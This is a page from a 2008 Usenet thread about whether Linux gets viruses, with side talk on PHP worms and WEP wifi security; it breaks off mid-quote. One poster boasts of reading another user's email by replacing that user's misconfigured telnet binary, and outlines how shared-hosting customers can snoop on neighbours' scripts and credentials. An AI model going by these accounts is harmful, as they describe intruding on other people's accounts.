Ubuntu & Antivirus - Ubuntu

This is a discussion on Ubuntu & Antivirus - Ubuntu ; On 2008-03-27, NoStop wrote: > Ignoramus17842 wrote: > >> On 2008-03-27, NoStop wrote: >>> Ignoramus17842 wrote: >>> >>>> On 2008-03-27, NoStop wrote: >>>>> Ignoramus17842 wrote: >>>>> >>>>>> I am sorry to burst anyone's bubble, but there are linux viruses. A ...

+ Reply to Thread
Page 4 of 7 FirstFirst ... 2 3 4 5 6 ... LastLast
Results 61 to 80 of 125

Thread: Ubuntu & Antivirus

  1. Re: Ubuntu & Antivirus

    On 2008-03-27, NoStop wrote:
    > Ignoramus17842 wrote:
    >
    >> On 2008-03-27, NoStop wrote:
    >>> Ignoramus17842 wrote:
    >>>
    >>>> On 2008-03-27, NoStop wrote:
    >>>>> Ignoramus17842 wrote:
    >>>>>
    >>>>>> I am sorry to burst anyone's bubble, but there are linux viruses. A
    >>>>>> lot of them spread via bad PHP software. I have seen some in
    >>>>>> action. That's the reason why I avoid PHP where possible.
    >>>>>>
    >>>>> You're not bursting my bubble. Prove it. Show us a linux virus that
    >>>>> spreads via bad PHP software.
    >>>>
    >>>> http://www.theregister.co.uk/2006/02/20/linux_worm/
    >>>> http://vil.nai.com/vil/content/v_136821.htm
    >>>>
    >>>

    > http://www.pandasecurity.com/enterpr...prod=&entorno=
    >>>>
    >>>> I run a webserver and frequently see those worms probing my
    >>>> webserver. I do not get infected since I have a anti-PHP policy.
    >>>>
    >>>> i
    >>>
    >>> All references are 3 years old. Tell us whether PHP has been patched
    >>> since then.

    >>
    >>
    >> It was patched a lot of times. I do not believe that it fully stopped
    >> PHP viruses. I am not going to do your research for you. Just last
    >> year I saw viruses probing for functions.php files on my server.
    >>

    > Scriptkiddies are ALWAYS probing. How do you know it's a "virus" that's
    > probing and if it is, is it coming from a compromised Windoze box?
    > Probably.


    Keep in mind that I know a lot more about security than you do. So try
    not to get too ****y.

    A year or two ago, I actually analyzed this situation. I had my server
    constantly probed by a virus. I wrote a simple cgi script to catch
    what it was doing.

    I believe that I have a post archived that discusses this. Including
    the source code of the virus.

    What this virus was doing, was to get the PHP software to include a
    remotely hosted malicious PHP code.

    That malicious code would download a perl script that was a little
    hard to read. The script would then run on the compromised box and
    perform malicious actions.

    If you want me to try to find it, I can find that post.

    i

  2. Re: Ubuntu & Antivirus

    Moog writes:

    > Hadron illuminated alt.os.linux.ubuntu by typing:
    >
    >>
    >> Bottom line : do not use WEP if you can at all help it.

    >
    > What if you don't have a WPA enabled router? Are ther any ways you can


    Then tough I guess. Get a new firmware upgrade or a new router IFF your
    data must remain more secure.

    > secure your WEP access? We know about restricting MAC addresses, but


    We are talking about people eavesdropping. It makes no difference.

    > wouldn't turning off ESSID's and DHCP allocation by the router go a
    > way towards getting WPA like usability from the device?


    No.

    >
    > We can all snort out a wep key, but cloning a MAC address from scratch
    > is *far* less easy. Stopping automatic allocation of IP addresses a
    > must.


    Actually its trivial - snoopers pick up the mac addresses in use and can
    use them at some later time if you disconnect that HW.

    But we are talking more about snooping - and its trivially easy to
    snoop.

    Clearly its more tricky for them to log on to your router - but keeping
    the data that travels through the airwaves secure means do not use WEP.

    --
    no more perl ... it's depressing ...
    i think perl and i need some time from each other
    we made beautiful music together about a year ago ...
    but times have change, we changed ..

  3. Re: Ubuntu & Antivirus

    On 2008-03-27, NoStop wrote:
    > Ignoramus17842 wrote:
    >
    >> On 2008-03-27, Beauregard T. Shagnasty
    >> wrote:
    >>> Ignoramus17842 wrote:
    >>>
    >>>> Beauregard T. Shagnasty wrote:
    >>>>> Ignoramus17842 wrote:
    >>>>>> NoStop wrote:
    >>>>>>> Ignoramus17842 wrote:
    >>>>>>>> I am sorry to burst anyone's bubble, but there are linux viruses.
    >>>>>>>> A lot of them spread via bad PHP software. I have seen some in
    >>>>>>>> action. That's the reason why I avoid PHP where possible.
    >>>>>>>>
    >>>>>>> You're not bursting my bubble. Prove it. Show us a linux virus that
    >>>>>>> spreads via bad PHP software.
    >>>>>>
    >>>>>> http://www.theregister.co.uk/2006/02/20/linux_worm/
    >>>>>> http://vil.nai.com/vil/content/v_136821.htm
    >>>>>>

    > http://www.pandasecurity.com/enterpr...prod=&entorno=
    >>>>>
    >>>>> Those old references do not actually prove these are Linux viruses or
    >>>>> worms. It would seem that if a Windows web server was running
    >>>>> three-year old unpatched PHP or CGI script, the result would be the
    >>>>> same.
    >>>>
    >>>> Sure. If a windows server was running that crap, it would be infected
    >>>> too. Which is the whole point.
    >>>
    >>> But it was not the point you were alluding to, which is, "but there are
    >>> linux viruses." No, they are web server application software
    >>> vulnerabilities, and not Linux vulns - or viruses.

    >>
    >> If Linux runs it, it is a Linux problem. phpbb is a part of some Linux
    >> distros.
    >>
    >>> A hacking attempt is not a virus, either. A PHP (Perl, ASP, C++,
    >>> DotNet, etc) security hole is not a virus, either.
    >>>
    >>> I would define a virus as a self-replicating 'program'.

    >>
    >> That's exactly what they are.
    >>
    >> They exploit the holes, start running on the hacked servers and look
    >> for more servers to hack.
    >>
    >>>>> Notice too, from your third link, that nearly all of the vulns are
    >>>>> cgi scripts. Still nothing to do with Linux.
    >>>>
    >>>> It has everything to do with linux if they run on Linux.
    >>>
    >>> See above. Hacking attempts do not "run on Linux."

    >>
    >> Yes they do. They run on those hacked servers.
    >>
    >>>>>> I run a webserver and frequently see those worms probing my
    >>>>>> webserver. I do not get infected since I have a anti-PHP policy.
    >>>>>
    >>>>> Does that mean you don't use PHP in the sites you write? Or don't
    >>>>> visit sites made with PHP?
    >>>>
    >>>> That means that I do not use PHP on any server that I host, with the
    >>>> exception of mediawiki.
    >>>
    >>> ..so "I do not use PHP" is not true, then. If you use that wiki, PHP is
    >>> installed - and available - on your server. You'd better be careful!

    >>
    >> I am trying to be careful indeed and do not run any PHP stuff other
    >> than Mediawiki.
    >>
    >>>>> I use hand-coded PHP for all my sites, and with no third-party
    >>>>> scripts or "cgi", and have yet to discover a vulnerability. Yes,
    >>>>> they are all hosted on Linux servers running cPanel.
    >>>>
    >>>> If no one knows what code you are writing, you most likely will be
    >>>> safe from automated attacks. But if your hand written code has
    >>>> vulnerabilities, and someone wants to hack you specifically, chances
    >>>> are good that you will be hacked.
    >>>
    >>> Well, it hasn't happened in many years...
    >>>
    >>>> Also if you are on shared hosting, most likely other users of that
    >>>> hosting would be able to see the source code of your script.
    >>>
    >>> I disagree with that statement.

    >>
    >> Give it a try. Try to write a PHP or perl CGI script that would get a
    >> listing of the directory one level above your home directory. Then see
    >> if subdirectories of that place have known sub-subdirectories such as
    >> public_html or whatever you can guess based on the naming convention
    >> that your ISP has for mapping websites to directories.
    >>
    >> Then find out the websites that run on the same IP as you (there are
    >> web sites to help you do this).
    >>
    >> Go from there.
    >>
    >>>> I hacked a user of panix.com 12 years ago
    >>>
    >>> ..and the security hole you used hasn't been patched yet, right?

    >>
    >> My hack was based on a user mistake and not on any security hole.
    >>
    >>
    >>>> because they set up wrong permissions on telnet binary that they
    >>>> uploaded to their account ~/bin/telnet (telnetting to outside was
    >>>> against panix policy and /usr/bin/telnet was mode 710). I then
    >>>> changed it to a altered version that was to run a script that I wrote
    >>>> to set other permissions to read his email. I am not a pro hacker
    >>>> either, it was just a USENET asshole on whom I needed some intel.
    >>>
    >>> Ah. So it wasn't a Linux vuln, or a PHP vuln, but a user shooting
    >>> himself in the foot by not setting up his web site or host correctly.
    >>> Still not a Linux vuln.

    >>
    >> No. But it is a good illustration tat getting ****y is a mistake.
    >>
    >>>> If you are on shared hosting, source code of your scripts is almost
    >>>> publicly available (to anyone with $12 to sign up for a month), as,
    >>>> most likely, are your database credentials.
    >>>
    >>> I've used shared hosting for ten years and never been hacked, nor have
    >>> my databases.

    >>
    >> So give the above experiment a try.
    >>
    >>>>> Your references would be valid (except for the Linux part) for web
    >>>>> authors still using Matt Wright's ten year old insecure formmail
    >>>>> script, for example.
    >>>>
    >>>> And a lot of other things.
    >>>
    >>> I did say Matt's well-known bad script, "for example." I regularly get
    >>> requests for "cgi/formmail.pl" - which of course does not exist.
    >>>
    >>>> Security is not simple and PHP is making it very difficult to be
    >>>> secure.
    >>>
    >>> No, of course it is not simple. But your arguments are flawed,
    >>> especially when trying to prove "it's a Linux virus."
    >>>
    >>>> Linux systems are not impervious to viruses. To think otherwise is to
    >>>> delude oneself and to invite trouble.
    >>>
    >>> I've been using Linux at home for about two years and haven't found any
    >>> problem with my computers...
    >>>

    >>
    >> I have been using Linux for 13 years (since 1995) and was not hacked
    >> either.
    >>
    >> i

    >
    > Then you're blowing smoke, aren't you? Why? is the next question.
    >
    > Cheers.
    >


    I am trying to educate you. Don't think that just because you have
    Linux installed, you will never get hacked. That's dangerous
    thinking that is incorrect and leads to trouble.

    Try this:

    http://www.theregister.co.uk/2007/10...nline_banking/

    ``At one point, he said, the bank spent a month as the largest
    phishing target in the country, and in fighting this ongoing problem,
    it has shutdown countless phishing sites surreptitiously installed on
    countless machines across the net.

    "These things are incredibly sophisticated, and when they take over a
    computer, most [users] don't know it," he said. "With every single
    phishing site [Washington Mutual has] shutdown, not one person was
    aware been aware that their machine was compromised and used for
    phishing. That includes university servers and company servers and
    personal PCs and all sorts of things."

    More interesting is that most of the compromised machines were not
    Windows machines. "The vast majority of [the phishing sites] we saw
    were on rootkit-ed Linux boxes, which was rather startling. We
    expected a predominance of Microsoft boxes and that wasn't the case."

    This pleased Microsoft's head of Silicon Valley PR, who served as a
    conference sponsor.

    Botnets are obviously a big problem for eBay as well, but Cullinane
    wouldn't quite say how big. "We see botnet attacks that are massive in
    their size and scope. We did a preliminary analysis and found over - I
    guess I'm not supposed to say that, what the number is - but we found
    a huge number of bots aimed specifically at eBay, trying to do things
    specifically to us."

    The problem has become so bad that eBay operates under the assumption
    that every personal PC is infected, he says. "With the desktop, we're
    starting to run on the assumption that anyone who's trying to contact
    us from their own personal desktop is probably coming from a
    compromised computer." ''
    i

  4. Re: Ubuntu & Antivirus

    Ignoramus17842 wrote:
    > On 2008-03-27, NoStop wrote:
    >> All references are 3 years old. Tell us whether PHP has been patched since
    >> then.
    >>

    >
    > It was patched a lot of times. I do not believe that it fully stopped
    > PHP viruses. I am not going to do your research for you. Just last
    > year I saw viruses probing for functions.php files on my server.


    Perhaps it would be wise to to the research for yourself?


    --
    John

    No Microsoft, Apple, Intel, Trend Micro, nor Ford products were used in the preparation or transmission of this message.

    The EULA sounds like it was written by a team of lawyers who want to tell me what I can't do. The GPL sounds like it was written by a human being, who wants me to know what I can do.

  5. Re: Ubuntu & Antivirus

    Hadron illuminated alt.os.linux.ubuntu by typing:
    > Moog writes:
    >
    >> Hadron illuminated alt.os.linux.ubuntu by typing:
    >>
    >>>
    >>> Bottom line : do not use WEP if you can at all help it.

    >>
    >> What if you don't have a WPA enabled router? Are ther any ways you can

    >
    > Then tough I guess. Get a new firmware upgrade or a new router IFF your
    > data must remain more secure.


    It was hypothetical. I have WPA. I know someone who has a none WPA
    enabled router though. I was hoping to offer advice.

    Looks like...."buy a new WIFI router" is order of the day

    --
    Moog

    "If this is gonna be that kinda party I'm gonna stick my dick in the
    mashed potatoes"

  6. Re: Ubuntu & Antivirus

    Ignoramus17842 wrote:


    > If Linux runs it, it is a Linux problem. phpbb is a part of some Linux
    > distros.



    That is about as poor a statement as, "Since I am reading your incorrect
    use of the term 'virus' on a Linux computer, it makes you an Ignoramus."


    --
    John

    No Microsoft, Apple, Intel, Trend Micro, nor Ford products were used in the preparation or transmission of this message.

    The EULA sounds like it was written by a team of lawyers who want to tell me what I can't do. The GPL sounds like it was written by a human being, who wants me to know what I can do.

  7. Re: Ubuntu & Antivirus

    On 2008-03-27, Moog wrote:
    > Hadron illuminated alt.os.linux.ubuntu by typing:
    >
    >>
    >> Bottom line : do not use WEP if you can at all help it.

    >
    > What if you don't have a WPA enabled router? Are ther any ways you can
    > secure your WEP access? We know about restricting MAC addresses, but
    > wouldn't turning off ESSID's and DHCP allocation by the router go a
    > way towards getting WPA like usability from the device?
    >
    > We can all snort out a wep key, but cloning a MAC address from scratch
    > is *far* less easy. Stopping automatic allocation of IP addresses a
    > must.
    >


    I would personally shell out $40 and buy a WPA enabled router.

    i

  8. Re: Ubuntu & Antivirus

    Ignoramus17842 wrote:
    > On 2008-03-27, William Poaster wrote:
    >
    >> Beauregard T. Shagnasty wrote:
    >>
    >>
    >>> Ignoramus17842 wrote:
    >>>
    >>>
    >>>> If Linux runs it, it is a Linux problem.
    >>>>
    >>>
    >>>
    >>>

    >> Waste of time, mate.
    >> Mind you, he did admit in comp.os.linux.misc that he trolls, which is why he
    >> changes the number after his "Ignoramus" nym, (which seems to suit him well,
    >> BTW) so he couldn't be quoted on past posts.
    >>
    >>

    >
    > All you can do is whine about my posting alias instead of properly
    > discussing the issue. The question was: can Linux be infected with a
    > virus. And the answer, that I provided, is "sure, if you happen to
    > have installed a PHP package with a bug, for example". You can be
    > disappointed with my posting alias, if you want, but it does not
    > change the truthfulness of what I said.
    >
    > And, mind you, I am being a realist here, not a Windows advocate.
    > Linux has bugs, cracks and viruses. A lot less than Windows, but a
    > non-zero amount.
    >
    > Just a month ago any user of most Linux systems could get root
    > privilege, for at least 2 days.
    >
    > If you were not aware of it, you need to stay more current on Linux
    > security instead of thinking that you can walk on water.
    >
    > Just google 'vmsplice hole'.
    >



    Read the first and second sentence.

    http://en.wikipedia.org/wiki/Computer_virus

    Did you understand, "...the term "virus" is commonly used, albeit
    erroneously,..."?

    --
    John

    No Microsoft, Apple, Intel, Trend Micro, nor Ford products were used in the preparation or transmission of this message.

    The EULA sounds like it was written by a team of lawyers who want to tell me what I can't do. The GPL sounds like it was written by a human being, who wants me to know what I can do.

  9. Re: Ubuntu & Antivirus

    NoStop wrote:

    > Frank wrote:
    >
    >
    >>NoStop wrote:
    >>
    >>>Ignoramus17842 wrote:
    >>>
    >>>
    >>>
    >>>>I am sorry to burst anyone's bubble, but there are linux viruses. A
    >>>>lot of them spread via bad PHP software. I have seen some in
    >>>>action. That's the reason why I avoid PHP where possible.
    >>>>
    >>>
    >>>You're not bursting my bubble. Prove it. Show us a linux virus that
    >>>spreads via bad PHP software.
    >>>
    >>>Thanks
    >>>
    >>>Cheers.
    >>>

    >>
    >>Live with it old man. You proly have an infected computer and are not
    >>even aware of it.
    >>Ignorance is bliss...LOL!
    >>Frank

    >
    >
    > Sorry numbnuts but no infection here.


    Liar! You're personally infected with MS hate and your urbuttoo is proly
    also infected...LOL!
    Frank

  10. Re: Ubuntu & Antivirus

    On 2008-03-27, John F. Morse wrote:
    > Ignoramus17842 wrote:
    >> On 2008-03-27, William Poaster wrote:
    >>
    >>> Beauregard T. Shagnasty wrote:
    >>>
    >>>
    >>>> Ignoramus17842 wrote:
    >>>>
    >>>>
    >>>>> If Linux runs it, it is a Linux problem.
    >>>>>
    >>>>
    >>>>
    >>>>
    >>> Waste of time, mate.
    >>> Mind you, he did admit in comp.os.linux.misc that he trolls, which is why he
    >>> changes the number after his "Ignoramus" nym, (which seems to suit him well,
    >>> BTW) so he couldn't be quoted on past posts.
    >>>
    >>>

    >>
    >> All you can do is whine about my posting alias instead of properly
    >> discussing the issue. The question was: can Linux be infected with a
    >> virus. And the answer, that I provided, is "sure, if you happen to
    >> have installed a PHP package with a bug, for example". You can be
    >> disappointed with my posting alias, if you want, but it does not
    >> change the truthfulness of what I said.
    >>
    >> And, mind you, I am being a realist here, not a Windows advocate.
    >> Linux has bugs, cracks and viruses. A lot less than Windows, but a
    >> non-zero amount.
    >>
    >> Just a month ago any user of most Linux systems could get root
    >> privilege, for at least 2 days.
    >>
    >> If you were not aware of it, you need to stay more current on Linux
    >> security instead of thinking that you can walk on water.
    >>
    >> Just google 'vmsplice hole'.
    >>

    >
    >
    > Read the first and second sentence.
    >
    > http://en.wikipedia.org/wiki/Computer_virus
    >
    > Did you understand, "...the term "virus" is commonly used, albeit
    > erroneously,..."?
    >


    These PHP exploits are often viruses as they use compromised hosts for
    self propagation.

    i

  11. Re: Ubuntu & Antivirus

    Harold Stevens schreef:
    > In Message-ID: <47eba2bd$0$14353$e4fe514c@news.xs4all.nl> Dirk T. Verbeek:
    >
    > [Snip...]
    >
    >> (I just wonder why it sounded you directed this as an accusation at me?)

    >
    > Sorry; it was NOT my intent at all. I'm actually fed up with wintrolls who
    > hype ancient *nix security lapses as sorryass "examples" of *nix bugs (not
    > you, definitely).
    >
    > If Morris is the best the M$ shills have to offer they're closer to having
    > a final Come To Jesus Meeting about net sanitation than even I imagined.
    >
    > I answered your post, because in it I found what seemed to be some wintard
    > on Morris, as a FU (apparently, the OP tripped into my bozobin).
    >
    > Again, apologies for any confusion about the "target" in my posting.
    >

    Hehe, no problem!

  12. Re: Ubuntu & Antivirus

    Ignoramus17842 wrote:


    > Keep in mind that I know a lot more about security than you do. So try
    > not to get too ****y.



    How would anybody know that? Just who are you? (A Wiki link will suffice.)

    I'd venture to guess that most people who have read your messages would
    wholeheartedly disagree with your obviously-****y brag.

    --
    John

    No Microsoft, Apple, Intel, Trend Micro, nor Ford products were used in the preparation or transmission of this message.

    The EULA sounds like it was written by a team of lawyers who want to tell me what I can't do. The GPL sounds like it was written by a human being, who wants me to know what I can do.

  13. Re: Ubuntu & Antivirus



    "Moog" wrote in message
    news:652f7kF2e47g5U2@mid.individual.net...
    > Hadron illuminated alt.os.linux.ubuntu by typing:
    >
    >>
    >> Bottom line : do not use WEP if you can at all help it.

    >
    > What if you don't have a WPA enabled router? Are ther any ways you can
    > secure your WEP access? We know about restricting MAC addresses, but
    > wouldn't turning off ESSID's and DHCP allocation by the router go a
    > way towards getting WPA like usability from the device?
    >
    > We can all snort out a wep key, but cloning a MAC address from scratch
    > is *far* less easy.


    You are joking!
    You can do it in the gui in windows if you want.

    > Stopping automatic allocation of IP addresses a
    > must.


    Makes no difference.


    If you need/want secure wireless using WEP you can setup a tunnel and use
    IPSEC or similar to encrypt it. Anyone can connect to the wireless but they
    aren't going anywhere. There are some nice wireless routers with endpoint
    termination if you want to do it.


  14. Re: Ubuntu & Antivirus

    Beauregard T. Shagnasty wrote:

    > William Poaster wrote:
    >
    >> Beauregard T. Shagnasty wrote:
    >>> Ignoramus17842 wrote:
    >>>
    >>>> If Linux runs it, it is a Linux problem.
    >>>
    >>>
    >>>

    >> Waste of time, mate.
    >> Mind you, he did admit in comp.os.linux.misc that he trolls, which is
    >> why he changes the number after his "Ignoramus" nym, (which seems to
    >> suit him well, BTW) so he couldn't be quoted on past posts.

    >
    > Oh, I see. I thought that "17842" was the number of Linux viruses he's
    > been infected with. Via PHP, of course.


    LOL!

    > I hadn't noticed he was changing the number.



    --
    Mandriva 1 - 2008 - RC2 - 64bit OS.
    COLA trolls: http://colatrolls.blogspot.com/

  15. Re: Ubuntu & Antivirus

    John F. Morse wrote:

    > Ignoramus17842 wrote:
    >> On 2008-03-27, William Poaster wrote:
    >>
    >>> Beauregard T. Shagnasty wrote:
    >>>
    >>>
    >>>> Ignoramus17842 wrote:
    >>>>
    >>>>
    >>>>> If Linux runs it, it is a Linux problem.
    >>>>>
    >>>>
    >>>>
    >>>>
    >>> Waste of time, mate.
    >>> Mind you, he did admit in comp.os.linux.misc that he trolls, which is why he
    >>> changes the number after his "Ignoramus" nym, (which seems to suit him well,
    >>> BTW) so he couldn't be quoted on past posts.
    >>>
    >>>

    >> All you can do is whine about my posting alias instead of properly
    >> discussing the issue. The question was: can Linux be infected with a
    >> virus. And the answer, that I provided, is "sure, if you happen to
    >> have installed a PHP package with a bug, for example". You can be
    >> disappointed with my posting alias, if you want, but it does not
    >> change the truthfulness of what I said.


    And it's been explained, but the ignoramus doesn't get it. And I wasn't whining,
    I was posting what he said. So don't be surprised about his trolling.

    >> And, mind you, I am being a realist here, not a Windows advocate.
    >> Linux has bugs, cracks and viruses. A lot less than Windows, but a
    >> non-zero amount.
    >>
    >> Just a month ago any user of most Linux systems could get root
    >> privilege, for at least 2 days.
    >>
    >> If you were not aware of it, you need to stay more current on Linux
    >> security instead of thinking that you can walk on water.
    >>
    >> Just google 'vmsplice hole'.
    >>

    >
    >
    > Read the first and second sentence.
    >
    > http://en.wikipedia.org/wiki/Computer_virus
    >
    > Did you understand, "...the term "virus" is commonly used, albeit
    > erroneously,..."?
    >


    --
    Mandriva 1 - 2008 - RC2 - 64bit OS.
    COLA trolls: http://colatrolls.blogspot.com/

  16. Re: Ubuntu & Antivirus

    John F. Morse wrote:

    > Ignoramus17842 wrote:
    >
    >
    >> Keep in mind that I know a lot more about security than you do. So try
    >> not to get too ****y.

    >
    >
    > How would anybody know that? Just who are you? (A Wiki link will suffice.)
    >
    > I'd venture to guess that most people who have read your messages would
    > wholeheartedly disagree with your obviously-****y brag.
    >

    Absolutely.

    --
    Mandriva 1 - 2008 - RC2 - 64bit OS.
    COLA trolls: http://colatrolls.blogspot.com/

  17. Re: Ubuntu & Antivirus

    "dennis@home" writes:

    > "Moog" wrote in message
    > news:652f7kF2e47g5U2@mid.individual.net...
    >> Hadron illuminated alt.os.linux.ubuntu by typing:
    >>
    >>>
    >>> Bottom line : do not use WEP if you can at all help it.

    >>
    >> What if you don't have a WPA enabled router? Are ther any ways you can
    >> secure your WEP access? We know about restricting MAC addresses, but
    >> wouldn't turning off ESSID's and DHCP allocation by the router go a
    >> way towards getting WPA like usability from the device?
    >>
    >> We can all snort out a wep key, but cloning a MAC address from scratch
    >> is *far* less easy.

    >
    > You are joking!
    > You can do it in the gui in windows if you want.
    >
    >> Stopping automatic allocation of IP addresses a
    >> must.

    >
    > Makes no difference.
    >
    >
    > If you need/want secure wireless using WEP you can setup a tunnel and
    > use IPSEC or similar to encrypt it. Anyone can connect to the wireless
    > but they aren't going anywhere. There are some nice wireless routers
    > with endpoint termination if you want to do it.
    >


    Yeah, ditto if he's using ssh over the link - perfectly safe then.

    --
    bwah, vodka in my mouse

  18. Re: Ubuntu & Antivirus

    Ignoramus17842 wrote:

    > On 2008-03-27, NoStop wrote:
    >> Ignoramus17842 wrote:
    >>
    >>> On 2008-03-27, Beauregard T. Shagnasty
    >>> wrote:
    >>>> Ignoramus17842 wrote:
    >>>>
    >>>>> Beauregard T. Shagnasty wrote:
    >>>>>> Ignoramus17842 wrote:
    >>>>>>> NoStop wrote:
    >>>>>>>> Ignoramus17842 wrote:
    >>>>>>>>> I am sorry to burst anyone's bubble, but there are linux viruses.
    >>>>>>>>> A lot of them spread via bad PHP software. I have seen some in
    >>>>>>>>> action. That's the reason why I avoid PHP where possible.
    >>>>>>>>>
    >>>>>>>> You're not bursting my bubble. Prove it. Show us a linux virus that
    >>>>>>>> spreads via bad PHP software.
    >>>>>>>
    >>>>>>> http://www.theregister.co.uk/2006/02/20/linux_worm/
    >>>>>>> http://vil.nai.com/vil/content/v_136821.htm
    >>>>>>>

    >>

    http://www.pandasecurity.com/enterpr...prod=&entorno=
    >>>>>>
    >>>>>> Those old references do not actually prove these are Linux viruses or
    >>>>>> worms. It would seem that if a Windows web server was running
    >>>>>> three-year old unpatched PHP or CGI script, the result would be the
    >>>>>> same.
    >>>>>
    >>>>> Sure. If a windows server was running that crap, it would be infected
    >>>>> too. Which is the whole point.
    >>>>
    >>>> But it was not the point you were alluding to, which is, "but there are
    >>>> linux viruses." No, they are web server application software
    >>>> vulnerabilities, and not Linux vulns - or viruses.
    >>>
    >>> If Linux runs it, it is a Linux problem. phpbb is a part of some Linux
    >>> distros.
    >>>
    >>>> A hacking attempt is not a virus, either. A PHP (Perl, ASP, C++,
    >>>> DotNet, etc) security hole is not a virus, either.
    >>>>
    >>>> I would define a virus as a self-replicating 'program'.
    >>>
    >>> That's exactly what they are.
    >>>
    >>> They exploit the holes, start running on the hacked servers and look
    >>> for more servers to hack.
    >>>
    >>>>>> Notice too, from your third link, that nearly all of the vulns are
    >>>>>> cgi scripts. Still nothing to do with Linux.
    >>>>>
    >>>>> It has everything to do with linux if they run on Linux.
    >>>>
    >>>> See above. Hacking attempts do not "run on Linux."
    >>>
    >>> Yes they do. They run on those hacked servers.
    >>>
    >>>>>>> I run a webserver and frequently see those worms probing my
    >>>>>>> webserver. I do not get infected since I have a anti-PHP policy.
    >>>>>>
    >>>>>> Does that mean you don't use PHP in the sites you write? Or don't
    >>>>>> visit sites made with PHP?
    >>>>>
    >>>>> That means that I do not use PHP on any server that I host, with the
    >>>>> exception of mediawiki.
    >>>>
    >>>> ..so "I do not use PHP" is not true, then. If you use that wiki, PHP
    >>>> is installed - and available - on your server. You'd better be careful!
    >>>
    >>> I am trying to be careful indeed and do not run any PHP stuff other
    >>> than Mediawiki.
    >>>
    >>>>>> I use hand-coded PHP for all my sites, and with no third-party
    >>>>>> scripts or "cgi", and have yet to discover a vulnerability. Yes,
    >>>>>> they are all hosted on Linux servers running cPanel.
    >>>>>
    >>>>> If no one knows what code you are writing, you most likely will be
    >>>>> safe from automated attacks. But if your hand written code has
    >>>>> vulnerabilities, and someone wants to hack you specifically, chances
    >>>>> are good that you will be hacked.
    >>>>
    >>>> Well, it hasn't happened in many years...
    >>>>
    >>>>> Also if you are on shared hosting, most likely other users of that
    >>>>> hosting would be able to see the source code of your script.
    >>>>
    >>>> I disagree with that statement.
    >>>
    >>> Give it a try. Try to write a PHP or perl CGI script that would get a
    >>> listing of the directory one level above your home directory. Then see
    >>> if subdirectories of that place have known sub-subdirectories such as
    >>> public_html or whatever you can guess based on the naming convention
    >>> that your ISP has for mapping websites to directories.
    >>>
    >>> Then find out the websites that run on the same IP as you (there are
    >>> web sites to help you do this).
    >>>
    >>> Go from there.
    >>>
    >>>>> I hacked a user of panix.com 12 years ago
    >>>>
    >>>> ..and the security hole you used hasn't been patched yet, right?
    >>>
    >>> My hack was based on a user mistake and not on any security hole.
    >>>
    >>>
    >>>>> because they set up wrong permissions on telnet binary that they
    >>>>> uploaded to their account ~/bin/telnet (telnetting to outside was
    >>>>> against panix policy and /usr/bin/telnet was mode 710). I then
    >>>>> changed it to a altered version that was to run a script that I wrote
    >>>>> to set other permissions to read his email. I am not a pro hacker
    >>>>> either, it was just a USENET asshole on whom I needed some intel.
    >>>>
    >>>> Ah. So it wasn't a Linux vuln, or a PHP vuln, but a user shooting
    >>>> himself in the foot by not setting up his web site or host correctly.
    >>>> Still not a Linux vuln.
    >>>
    >>> No. But it is a good illustration tat getting ****y is a mistake.
    >>>
    >>>>> If you are on shared hosting, source code of your scripts is almost
    >>>>> publicly available (to anyone with $12 to sign up for a month), as,
    >>>>> most likely, are your database credentials.
    >>>>
    >>>> I've used shared hosting for ten years and never been hacked, nor have
    >>>> my databases.
    >>>
    >>> So give the above experiment a try.
    >>>
    >>>>>> Your references would be valid (except for the Linux part) for web
    >>>>>> authors still using Matt Wright's ten year old insecure formmail
    >>>>>> script, for example.
    >>>>>
    >>>>> And a lot of other things.
    >>>>
    >>>> I did say Matt's well-known bad script, "for example." I regularly get
    >>>> requests for "cgi/formmail.pl" - which of course does not exist.
    >>>>
    >>>>> Security is not simple and PHP is making it very difficult to be
    >>>>> secure.
    >>>>
    >>>> No, of course it is not simple. But your arguments are flawed,
    >>>> especially when trying to prove "it's a Linux virus."
    >>>>
    >>>>> Linux systems are not impervious to viruses. To think otherwise is to
    >>>>> delude oneself and to invite trouble.
    >>>>
    >>>> I've been using Linux at home for about two years and haven't found any
    >>>> problem with my computers...
    >>>>
    >>>
    >>> I have been using Linux for 13 years (since 1995) and was not hacked
    >>> either.
    >>>
    >>> i

    >>
    >> Then you're blowing smoke, aren't you? Why? is the next question.
    >>
    >> Cheers.
    >>

    >
    > I am trying to educate you. Don't think that just because you have
    > Linux installed, you will never get hacked. That's dangerous
    > thinking that is incorrect and leads to trouble.
    >

    You can start by trying to educate yourself. Mission Impossible?

    > Try this:
    >
    > http://www.theregister.co.uk/2007/10...nline_banking/
    >
    > ``At one point, he said, the bank spent a month as the largest
    > phishing target in the country, and in fighting this ongoing problem,
    > it has shutdown countless phishing sites surreptitiously installed on
    > countless machines across the net.
    >
    > "These things are incredibly sophisticated, and when they take over a
    > computer, most [users] don't know it," he said. "With every single
    > phishing site [Washington Mutual has] shutdown, not one person was
    > aware been aware that their machine was compromised and used for
    > phishing. That includes university servers and company servers and
    > personal PCs and all sorts of things."
    >
    > More interesting is that most of the compromised machines were not
    > Windows machines. "The vast majority of [the phishing sites] we saw
    > were on rootkit-ed Linux boxes, which was rather startling. We
    > expected a predominance of Microsoft boxes and that wasn't the case."
    >
    > This pleased Microsoft's head of Silicon Valley PR, who served as a
    > conference sponsor.
    >
    > Botnets are obviously a big problem for eBay as well, but Cullinane
    > wouldn't quite say how big. "We see botnet attacks that are massive in
    > their size and scope. We did a preliminary analysis and found over - I
    > guess I'm not supposed to say that, what the number is - but we found
    > a huge number of bots aimed specifically at eBay, trying to do things
    > specifically to us."
    >
    > The problem has become so bad that eBay operates under the assumption
    > that every personal PC is infected, he says. "With the desktop, we're
    > starting to run on the assumption that anyone who's trying to contact
    > us from their own personal desktop is probably coming from a
    > compromised computer." ®''
    > i


    Totally irrelevant. Nothing to do with Linux getting viruses. Possibly has
    something to do with DOS attacks from compromised Windoze boxes, but that's
    another story.

    Cheers.

    --
    The world can't afford the rich.

    Q: What OS is built for lusers?
    A: Which one requires running lusermgr.msc to create them?

    Francis (Frank) adds a new "gadget" to his Vista box ...
    Download it here: http://tinyurl.com/2hnof6



  19. Re: Ubuntu & Antivirus

    On 2008-03-28, NoStop wrote:
    > Ignoramus17842 wrote:
    >
    >> On 2008-03-27, NoStop wrote:
    >>> Ignoramus17842 wrote:
    >>>
    >>>> On 2008-03-27, Beauregard T. Shagnasty
    >>>> wrote:
    >>>>> Ignoramus17842 wrote:
    >>>>>
    >>>>>> Beauregard T. Shagnasty wrote:
    >>>>>>> Ignoramus17842 wrote:
    >>>>>>>> NoStop wrote:
